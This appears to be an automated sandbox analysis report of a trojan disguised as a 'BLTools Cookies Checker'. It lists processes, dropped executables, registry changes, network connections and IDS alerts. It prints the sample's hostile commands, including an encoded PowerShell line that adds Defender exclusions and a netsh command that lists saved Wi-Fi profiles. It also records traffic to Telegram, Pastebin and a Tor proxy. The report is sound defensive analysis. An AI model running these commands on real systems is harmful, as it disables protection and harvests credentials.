c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1608"C:\Users\admin\AppData\Local\Temp\z.exe" C:\Users\admin\AppData\Local\Temp\z.exe
bltool 2.7..2.exe
User:
admin
Integrity Level:
HIGH
Description:
BLTools Cookies Checker
Exit code:
3762504530
Version:
2.7.2.0
Modules
Images
c:\users\admin\appdata\local\temp\z.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
1928"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllC:\Windows\System32\cmd.exebabu.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2016"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AagBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAcQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAZgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBhACMAPgA="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exebltool 2.7..2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2256"C:\Users\admin\AppData\Local\Temp\bltool 2.7..2.exe" C:\Users\admin\AppData\Local\Temp\bltool 2.7..2.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Description:
BLTools Cookies Checker
Exit code:
0
Version:
2,7,2,0
Modules
Images
c:\users\admin\appdata\local\temp\bltool 2.7..2.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
2340netsh wlan show profile C:\Windows\System32\netsh.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Network Command Shell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll
2448findstr AllC:\Windows\System32\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Find String (QGREP) Utility
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
Total events
5 504
Read events
5 404
Write events
100
Delete events
0

Modification events

(PID) Process:(2256) bltool 2.7..2.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2256) bltool 2.7..2.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2256) bltool 2.7..2.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2256) bltool 2.7..2.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2016) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2016) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2016) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2016) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2340) netsh.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(668) babu.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
Executable files
2
Suspicious files
3
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2016powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2256bltool 2.7..2.exeC:\Users\admin\AppData\Local\Temp\z.exeexecutable
MD5:528B540E2AEC29669239482DC9979F4C
SHA256:28F71E8F8C650B109771F51695785420401839499E15E41A2C634BCE4AB5456C
2016powershell.exeC:\Users\admin\AppData\Local\Temp\p25ioqg1.q31.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2016powershell.exeC:\Users\admin\AppData\Local\Temp\xc0g4ttl.yth.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2256bltool 2.7..2.exeC:\Users\admin\AppData\Local\Temp\babu.exeexecutable
MD5:992EBC4C599CA9B6F7E6B1A843609E7D
SHA256:73D5C4D972107C9BF50F0366A4E8466A3FEC84009CCC080E51FEBE5393708ED4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
8
DNS requests
3
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
668
babu.exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
binary
288 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
668
babu.exe
208.95.112.1:80
ip-api.com
TUT-AS
US
unknown
668
babu.exe
149.154.167.99:443
t.me
Telegram Messenger Inc
GB
unknown
668
babu.exe
104.20.67.143:443
pastebin.com
CLOUDFLARENET
unknown
668
babu.exe
195.66.87.105:8990
NTX Technologies s.r.o.
SC
unknown

DNS requests

Domain
IP
Reputation
ip-api.com
  • 208.95.112.1
shared
t.me
  • 149.154.167.99
whitelisted
pastebin.com
  • 104.20.67.143
  • 172.67.34.170
  • 104.20.68.143
shared

Threats

PID
Process
Class
Message
668
babu.exe
Potential Corporate Privacy Violation
AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
668
babu.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
668
babu.exe
Misc activity
ET INFO Observed Telegram Domain (t .me in TLS SNI)
668
babu.exe
Potentially Bad Traffic
ET INFO Onion/TOR Proxy Client Request
668
babu.exe
Potential Corporate Privacy Violation
ET POLICY Socks5 Proxy to Onion (set)
668
babu.exe
Potentially Bad Traffic
ET INFO Onion/TOR Successful Proxy Request Response (Inbound)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
bltool 2.7..2.exe